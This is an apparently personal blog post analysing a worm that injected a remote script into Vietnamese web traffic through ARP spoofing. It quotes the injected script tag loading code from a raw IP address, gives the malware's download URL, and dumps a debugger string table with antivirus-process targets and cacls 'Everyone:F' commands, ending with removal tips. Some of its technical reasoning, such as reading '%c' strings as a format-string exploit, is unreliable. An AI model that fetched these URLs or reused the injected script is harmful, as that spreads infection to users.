In the last few days there was an attack from a Chinese hacker to computer networks in Vietnam. When surfing the Internet, especially on Vietnamese websites, many people see advertisements of Chinese websites roaming around the pages. There's a rumour going around that this attack is related to the recent clash between China and Vietnam over some islands, but I'm in no position to discuss about it :P
Anyway, as a patriot, I decided to make everything clear once and for all. By checking the source code of the pages, I found the following piece of code "injected" on the pages:
<script src=http://121.15.220.104/1.js></script>I came to a conclusion that this was a man-in-the-middle attack, in which the hacker pwnzored a node somewhere between the victim computers and the host, and filtered the content on-the-fly. After doing some research on Google, I found that this was done with a virus that attacked a computer, then turned it into a gateway by faking the MAC address, and then filtered everything that went through it (this method is called ARP spoofing). Also I found a program that was probably the evil thing spreading the virus over the network: http://121.15.220.104/Setup.exe.
I decided to have a look at it. After some unpacking, I was able to load in under OllyDbg. You would be amazed to see the String table:
Address Disassembly Text stringI can tell this virus is really dangerous. It kills every anti-virus program you have in an instant. The existence of those %c shows that it is using a buffer overflow/format string exploit, which is very effective against a naive operating system like Windows. It also opens some ports on your computer: 135, 139, 445, 1026, and 5152.
004016B4 PUSH Setup.0040B058 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004016C5 PUSH Setup.0040B054 ASCII " ""
0040175E PUSH Setup.0040B04C ASCII "\*"
004017E4 PUSH Setup.0040B040 ASCII ".."
004019C6 MOV EDI,Setup.0040B100 ASCII "%c%c%c"
00401AC1 PUSH Setup.0040B040 ASCII ".."
00401B24 PUSH Setup.0040B0F8 ASCII "360"
00401B3A MOV EAX,Setup.0040B0F4 ASCII "AD"
00401BAB MOV EAX,Setup.0040B0F0 ASCII "GO"
00401C45 PUSH Setup.0040B0EC ASCII ".js"
00401CC6 PUSH Setup.0040B0E8 ASCII "exe"
00401D2A PUSH Setup.0040B0E4 ASCII "\~"
00401E4A PUSH Setup.0040B0E0 ASCII "rar"
00401E5E PUSH Setup.0040B0DC ASCII "zip"
00401E9E CMP DWORD PTR SS:[EBP-1EC],500000 ASCII "Actx "
00401EE1 PUSH Setup.0040B0D4 ASCII "\bak\"
00401F5F PUSH Setup.0040B0CC ASCII " X ""
00401F6A PUSH Setup.0040B0C8 ASCII "" ""
00401F95 PUSH Setup.0040B0B4 ASCII "" -r -inul -ibck -y"
0040203C PUSH Setup.0040B0D4 ASCII "\bak\"
004020BE PUSH Setup.0040B0D4 ASCII "\bak\"
00402108 PUSH Setup.0040B0AC ASCII " A ""
00402113 PUSH Setup.0040B0C8 ASCII "" ""
00402138 PUSH Setup.0040B084 ASCII "*.*" -r -inul -ibck -y -m0 -df -ep -ep1"
00402230 PUSH Setup.0040B080 ASCII "ddd"
00402285 PUSH Setup.0040B0D4 ASCII "\bak\"
0040255D PUSH Setup.0040B11C ASCII "^|"
004025B0 PUSH Setup.0040B10C ASCII "cmd.exe /c ""
0040279B PUSH Setup.0040B120 ASCII "%c:\"
00402974 PUSH Setup.0040B284 ASCII "ieframe"
00402988 PUSH Setup.0040B274 ASCII "cabinetwclass"
0040299C PUSH Setup.0040B25C ASCII "mozillauiwindowclass"
004029B0 PUSH Setup.0040B254 ASCII "metapad"
004029C5 PUSH Setup.0040B24C ASCII "dr.web"
004029DB PUSH Setup.0040B244 ASCII "avg "
00402A03 PUSH Setup.0040B230 ASCII "tapplication"
00402A27 PUSH Setup.0040B220 ASCII "AfxMDIFrame42s"
00402A3A PUSH Setup.0040B218 ASCII "360safe"
00402A50 PUSH Setup.0040B218 ASCII "360safe"
00402A66 PUSH Setup.0040B210 ASCII "360anti"
00402A7C PUSH Setup.0040B208 ASCII "afx:"
00402AAB MOV EDI,Setup.0040B200 ASCII "#32770"
00402AD2 PUSH Setup.0040B1E8 ASCII "thunderrt6main"
00402AF8 PUSH Setup.0040B1E0 ASCII "antivir"
00402B3A PUSH Setup.0040B1C8 ASCII "kvxp"
00402BC4 PUSH Setup.0040B198 ASCII "thunderrt6formdc"
00402BDE PUSH Setup.0040B188 ASCII "ThunderRT6Timer"
00402BF1 PUSH Setup.0040B180 ASCII "ewido"
00402C07 PUSH Setup.0040B178 ASCII "escan"
00402C1D PUSH Setup.0040B170 ASCII "mcagent"
00402C7E PUSH Setup.0040B158 ASCII "bitdefender"
00402C99 PUSH Setup.0040B148 ASCII "facelesswndproc"
00402D3A PUSH Setup.0040B130 ASCII "##vso##"
00402D4D PUSH Setup.0040B128 ASCII "avast"
00402E58 PUSH Setup.0040B0E8 ASCII "exe"
00402FAE PUSH Setup.0040B9C0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00403005 PUSH Setup.0040B9A4 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c"
00403046 PUSH Setup.0040B96C ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00403057 MOV EDI,Setup.0040B968 ASCII "XOR"
00403098 PUSH Setup.0040B200 ASCII "#32770"
00403122 PUSH Setup.0040B960 ASCII "xxpin"
004031C5 PUSH Setup.0040B8B0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004032A4 PUSH Setup.0040B7D4 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004032FC PUSH Setup.0040B96C ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00403323 PUSH Setup.0040B7C8 ASCII "%c%c%c%c%c"
00403355 PUSH Setup.0040B7B4 ASCII "%c%c%c%c%c%c%c%c%c"
00403385 PUSH Setup.0040B7A0 ASCII "%c%c%c%c%c%c%c%c"
0040342C PUSH Setup.0040B744 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004034A2 PUSH Setup.0040B738 ASCII "%s\cmd.exe"
004034D7 PUSH Setup.0040B730 ASCII "%s\com"
004034F1 PUSH Setup.0040B728 ASCII "%s\%s"
0040352D PUSH Setup.0040B718 ASCII "pagefile.pif"
00403544 PUSH Setup.0040B708 ASCII "CabinetWClass"
00403897 PUSH Setup.0040B688 ASCII "%c%c%ct%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004038D3 PUSH Setup.0040B678 ASCII "Common Startup"
004038F9 PUSH Setup.0040B728 ASCII "%s\%s"
00403989 PUSH Setup.0040B61C ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004039F2 PUSH Setup.0040B614 ASCII ".exe"
00403AA0 PUSH Setup.0040B5DC ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00403B14 PUSH Setup.0040B614 ASCII ".exe"
00403B6E PUSH Setup.0040B5D0 ASCII "\rar.exe"
00403B73 PUSH Setup.0040B5C4 ASCII "\winrar.exe"
00403C0C PUSH Setup.0040B544 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00403CA2 PUSH Setup.0040B4F0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00403D19 PUSH Setup.0040B4E4 ASCII " /e /t /g "
00403D3A PUSH Setup.0040B4E0 ASCII ":F"
00403D52 PUSH Setup.0040B4D4 ASCII "cacls.exe"
00403D7F PUSH Setup.0040B4BC ASCII " /e /t /g Everyone:F"
00403D93 PUSH Setup.0040B4D4 ASCII "cacls.exe"
00403DCC PUSH Setup.0040B4E4 ASCII " /e /t /g "
00403DF1 PUSH Setup.0040B4E0 ASCII ":F"
00403E09 PUSH Setup.0040B4D4 ASCII "cacls.exe"
00403E72 PUSH Setup.0040B4BC ASCII " /e /t /g Everyone:F"
00403E8A PUSH Setup.0040B4D4 ASCII "cacls.exe"
00403EDB PUSH Setup.0040B4E4 ASCII " /e /t /g "
00403F00 PUSH Setup.0040B4E0 ASCII ":F"
00403F18 PUSH Setup.0040B4D4 ASCII "cacls.exe"
00403F81 PUSH Setup.0040B4BC ASCII " /e /t /g Everyone:F"
00403F99 PUSH Setup.0040B4D4 ASCII "cacls.exe"
00404053 PUSH Setup.0040B4B0 ASCII "\ntfsus.exe"
004040BC PUSH Setup.0040B4AC ASCII "pac"
00404190 PUSH Setup.0040B4A8 ASCII " ^"
00404212 PUSH Setup.0040B614 ASCII ".exe"
0040424F PUSH Setup.0040B49C ASCII ".exe.log"
0040426C PUSH Setup.0040B4A8 ASCII " ^"
004042EE PUSH Setup.0040B494 ASCII "%s.~"
004042FF PUSH Setup.0040B48C ASCII "%s.exe"
0040436D MOV EDI,Setup.0040B484 ASCII ".log"
0040444D PUSH Setup.0040B47C ASCII "\netc"
0040445E PUSH Setup.0040B474 ASCII "fg.000"
0040446B PUSH Setup.0040B468 ASCII "\netcfg.dll"
004044A8 PUSH Setup.0040B464 ASCII "#32"
004044B5 PUSH Setup.0040B460 ASCII "770"
00404569 PUSH Setup.0040B450 ASCII "CNJBlaipbofF"
004045BE PUSH Setup.0040B438 ASCII "%c%c%c%c%c%c%c%c%c%c%c"
004045F3 PUSH Setup.0040B120 ASCII "%c:\"
004046B0 PUSH Setup.0040B414 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004046D7 PUSH Setup.0040B728 ASCII "%s\%s"
00404744 PUSH Setup.0040B408 ASCII "%s\boot.ini"
00404822 PUSH Setup.0040B400 ASCII "\bak"
0040489A PUSH Setup.0040B3E0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004048B8 PUSH Setup.0040B728 ASCII "%s\%s"
004048F1 PUSH Setup.0040B7A0 ASCII "%c%c%c%c%c%c%c%c"
0040490C PUSH Setup.0040B728 ASCII "%s\%s"
00404949 PUSH Setup.0040B3C8 ASCII "%c%c%c%c%c%c%c%c%c%c"
00404973 PUSH Setup.0040B728 ASCII "%s\%s"
004049BA PUSH Setup.0040B400 ASCII "\bak"
004049DB PUSH Setup.0040B400 ASCII "\bak"
00404A15 PUSH Setup.0040B400 ASCII "\bak"
00404A60 PUSH Setup.0040B9C0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00404B7A PUSH Setup.0040B2AC ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%"...
00404EE6 PUSH Setup.0040BA38 ASCII "ping.exe -f -n 1 www.baidu.com"
00405004 PUSH Setup.0040BA5C ASCII "rb"
00405077 PUSH Setup.0040BA5C ASCII "rb"
00405117 PUSH Setup.0040BA58 ASCII "wb"
00405229 MOV DWORD PTR SS:[ESP],Setup.0040BA5C ASCII "rb"
00405648 MOV DWORD PTR SS:[ESP],Setup.0040BA5C ASCII "rb"
00405669 PUSH Setup.0040BA58 ASCII "wb"
0040578F PUSH Setup.0040BA60 ASCII "cmd.exe /c del /F /Q ""
00405800 PUSH Setup.0040BA58 ASCII "wb"
004059E7 PUSH Setup.0040B438 ASCII "%c%c%c%c%c%c%c%c%c%c%c"
00405A38 PUSH Setup.0040B7B4 ASCII "%c%c%c%c%c%c%c%c%c"
00405A52 MOV ESI,Setup.0040BB9C ASCII "
"
00405A87 PUSH Setup.0040B414 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00405AD1 PUSH Setup.0040BB70 ASCII "%c%c%c%c%c%c%c%c%c%c%c%s%s%c%c%c%c"
00405B2E PUSH Setup.0040BB30 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00405B79 PUSH Setup.0040BB04 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00405BD6 PUSH Setup.0040BAC0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s%s%s%s%c%c%c%c"
00405C37 PUSH Setup.0040BA78 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00405D5C PUSH Setup.0040BBA0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c"
00405EDF PUSH Setup.0040B120 ASCII "%c:\"
00405F11 MOV EBP,Setup.0040B400 ASCII "\bak"
0040602B PUSH Setup.0040B438 ASCII "%c%c%c%c%c%c%c%c%c%c%c"
0040606C PUSH Setup.0040BBA0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c"
00406099 PUSH Setup.0040B120 ASCII "%c:\"
00406241 PUSH Setup.0040BE90 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
0040628F PUSH Setup.0040B3E0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406391 PUSH Setup.0040BDE4 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406476 PUSH Setup.0040BD30 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406553 PUSH Setup.0040BDE4 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406634 PUSH Setup.0040BD30 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004066FD PUSH Setup.0040BC9C ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004067BD PUSH Setup.0040BE90 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406814 PUSH Setup.0040BC74 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
0040690C PUSH Setup.0040BBD4 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406950 MOV EDI,Setup.0040BBCC ASCII "Type"
0040696D MOV EBX,Setup.0040BBC4 ASCII "radio"
004069E2 PUSH Setup.0040BBBC ASCII "IEFrame"
00406A43 PUSH Setup.0040B9C0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406B62 PUSH Setup.0040BF0C ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406CA3 PUSH Setup.0040BF3C ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406CB4 PUSH Setup.0040B968 ASCII "XOR"
004073DB SUB ESP,68 (Initial CPU selection)
00407539 PUSH 10000 UNICODE "=::=::\"
As I'm running out of time for tonight, let's leave the detailed analysis of the virus for later, and get to the removal instruction. If you have a look at the running processes under Security Task Manager, you'll see that the virus is faking the name of lsass.exe and smss.exe, with similar ones in C:\Windows\system32\com\. Also it probably wants to hijack your browser with ljjijgf.dll in C:\Windows\system32\ too. Get rid of them and you're safe :)
Update: as discovered by my little brother, you need to get rid of 2 other fake files: rar.exe and alg.exe somewhere in the Windows directory too.
Update2: the virus has been identified as W32.Dashfer.Worm by BKIS. You can get BKAV to wipe the virus away from your computer.
And finally, some images for your curious eyes:
No comments:
Post a Comment